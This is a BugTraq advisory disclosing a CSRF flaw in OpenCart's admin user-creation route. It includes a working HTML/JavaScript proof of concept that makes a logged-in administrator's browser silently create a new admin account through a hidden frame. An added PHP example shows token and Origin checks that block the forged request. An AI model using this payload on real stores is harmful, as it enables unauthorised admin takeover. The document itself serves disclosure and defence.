BugTraq
OpenCart CSRF Vulnerability Feb 02 2010 03:13PM
ben visionsource org
Advisory Information:

Title: OpenCart CSRF Vulnerability

Advisory URL:

http://blog.visionsource.org/2010/01/28/opencart-csrf-vulnerability/

Date published: 2010-01-28

Vendors contacted: OpenCart

Security Risk: High

Vulnerability Description:

OpenCart is vulnerable to CSRF attacks using the POST method. It is possible to craft a malicious page that will create an administrator user when the victim, who is logged into OpenCart, visits the malicious page.

Proofs of Concept:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>

<head>

<title>OpenCart CSRF Vulnerability</title>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<script type="text/javascript">

function csrfInjection()

{

var params = {

'username' : 'an_attacker',

'firstname' : 'attack',

'lastname' : 'user',

'email' : 'some.user (at) randomatackerdomain (dot) com [email concealed]',

'user_group_id' : '1', //Default group id for administrator level is 1

'password' : 'test',

'confirm' : 'test',

'status' : '1'

};

var form = document.createElement("form");

form.setAttribute("method", "post");

form.setAttribute("action", document.getElementById('site_url').value + "/index.php?route=user/user/insert");

for(var key in params) {

var hiddenField = document.createElement("input");

hiddenField.setAttribute("type", "hidden");

hiddenField.setAttribute("name", key);

hiddenField.setAttribute("value", params[key]);

form.appendChild(hiddenField);

}

attack_result.document.body.appendChild(form);

form.submit();

}

</script>

</head>

<body>

OpenCart CSRF Vulnerability

<input type="text" name="site_url" id="site_url" size="50" />/index.php?route=user/user/insert<br />

<a href="#" onclick="csrfInjection();return false;">Add User</a>

<p>Results: (this frame can be hidden so the user never knows the attack was performed)</p>

<iframe id="attack_result" name="attack_result" width="600" height="600"></iframe>

</body>

</html>
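
The PoC succeeds because the user/user/insert route accepts any POST that arrives with the administrator's session cookie. As an added example (not part of the original advisory and not OpenCart's own code), one way to reject such a request is a per-session token checked on every state-changing POST, combined with an Origin check. The function names, the csrf_token field and the https://shop.example origin are assumptions made for illustration.

```php
<?php
// Added example, not OpenCart code. Function and field names are hypothetical.

// Issue one random token per session; the admin form embeds it in a hidden field.
function csrf_issue_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Accept a state-changing request only if it is a POST, comes from our own
// origin (when the browser sent an Origin header) and carries the session token.
function csrf_request_allowed(array $session, array $server, array $post, string $ownOrigin): bool
{
    if (($server['REQUEST_METHOD'] ?? '') !== 'POST') {
        return false;
    }
    $origin = $server['HTTP_ORIGIN'] ?? null;
    if ($origin !== null && $origin !== $ownOrigin) {
        return false;
    }
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    // hash_equals compares in constant time; an empty expected token never matches.
    return is_string($supplied) && $expected !== '' && hash_equals($expected, $supplied);
}

// Constructed sample requests against the user-creation route from the advisory.
$session = [];
$token = csrf_issue_token($session);
$own = 'https://shop.example'; // assumed origin of the shop's admin panel

$forged = ['username' => 'an_attacker', 'user_group_id' => '1']; // PoC-style fields, no token
$legit = ['username' => 'new_admin', 'user_group_id' => '1', 'csrf_token' => $token];

$cases = [
    'cross-site form, no token' => [['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => 'https://other.example'], $forged],
    'no Origin header, no token' => [['REQUEST_METHOD' => 'POST'], $forged],
    'admin form with token' => [['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => $own], $legit],
];
foreach ($cases as $label => [$server, $post]) {
    $ok = csrf_request_allowed($session, $server, $post, $own);
    printf("%-28s %s\n", $label, $ok ? 'accepted' : 'rejected (403)');
}
```

Only the third request is accepted: a page on another site can make the browser send the session cookie, but it cannot read the token stored in the victim's session.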
